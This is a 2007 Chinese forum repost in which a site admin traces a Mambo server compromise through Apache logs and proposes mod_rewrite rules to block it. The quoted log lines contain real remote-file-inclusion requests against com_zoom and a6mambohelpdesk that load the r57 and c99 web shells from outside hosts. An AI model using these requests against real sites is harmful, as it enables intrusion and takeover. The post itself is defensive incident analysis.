论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2007-03-22 19:17 |只看该作者 |倒序浏览

有关Mambo components (com_zoom等) 漏洞的处理
前些日子，朋友的一个Mambo的站点，突然流量暴涨，从早上6点开始，从mrtg上看，流量已经跑到100M，而且网站用户也投诉说访问特别慢，从而想到，可以是被入侵了。
检查后，发现系统被植入了一个syn flood攻击软件。
经过简单处理，站点恢复了正常，开始考虑如何找到问题的根源。
站点是CentOS4.4 final搭建的，前期的的安全措施也作了很多，理论上应该不会有被入侵的可能。
因为对php不是很熟悉，原来对Mambo也没做过研究，经过考虑，唯一可能的入侵途径，只能是通过web，经过彻底检查，从web server 的access_log中发现了一些异常，发现了以下类似的纪录：
88.244.17.234
- - [05/Mar/2007:02:41:28 +0800] "GET
/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://indir.savsak.com/shell.txt?
HTTP/1.0" 200
377
88.244.17.234 - - [05/Mar/2007:02:41:31
+0800] "GET
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://indir.savsak.com/shell.txt?
HTTP/1.0" 200 377
88.244.17.234 - - [05/Mar/2007:02:51:25 +0800]
"GET
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
HTTP/1.1" 200 30252
88.244.17.234 - - [05/Mar/2007:02:52:18 +0800]
"POST
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
HTTP/1.1" 200 29455
88.244.17.234 - - [05/Mar/2007:02:52:32 +0800]
"POST
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
HTTP/1.1" 200 28116
88.244.17.234 - - [05/Mar/2007:02:54:11 +0800]
"POST
/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
HTTP/1.1" 200 28754
88.229.196.156 - - [06/Mar/2007:07:22:28 +0800]
"GET
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.spy-team.org/c99.jpg?
HTTP/1.1" 200 4851
从而确认对方是通过com_zoom漏洞入侵的。
后来经过彻底检查，同时发现了针对administrator/components目录也进行了类似的攻击。
问题找到了，就开始想办法解决，因为对Mambo不是很熟悉，所以就打消了对Mambo系统进行修改或者升级的想法。
后来，经过分析，发现正常的用户访问，应该不会有类似GET /components/com_zoom/classes/iptc/EXIF_Makernote.php这种形式的，因此考虑通过Apache的rewrite模块对其访问进行一些限制：
如下：
   RewriteRule ^(/components/.*)/(.*\.(png|gif|jpg))$ /$1/$2
      RedirectMatch ^(/components/.*)/(.*\.(php|js))  http://www.abc.cn
      RedirectMatch ^/(administrator/components/.*) http://www.abc.cn/
      RedirectMatch ^/(administrator/popups/.*) http://www.abc.cn/
经过自己的测试，发现还是可以基本上解决这个问题的。
不知是否有这方面的高手，可以给一个完整的解决方案？

本文来自ChinaUnix博客，如果查看原文请点：http://blog.chinaunix.net/u/1589/showart_263352.html

文库|博客

返回列表

Chinaunix › 论坛 › 操作系统 › Linux新手园地 › Linux文档专区 › 有关Mambo components (com_zoom等) 漏洞的处理

有关Mambo components (com_zoom等) 漏洞的处理 [复制链接]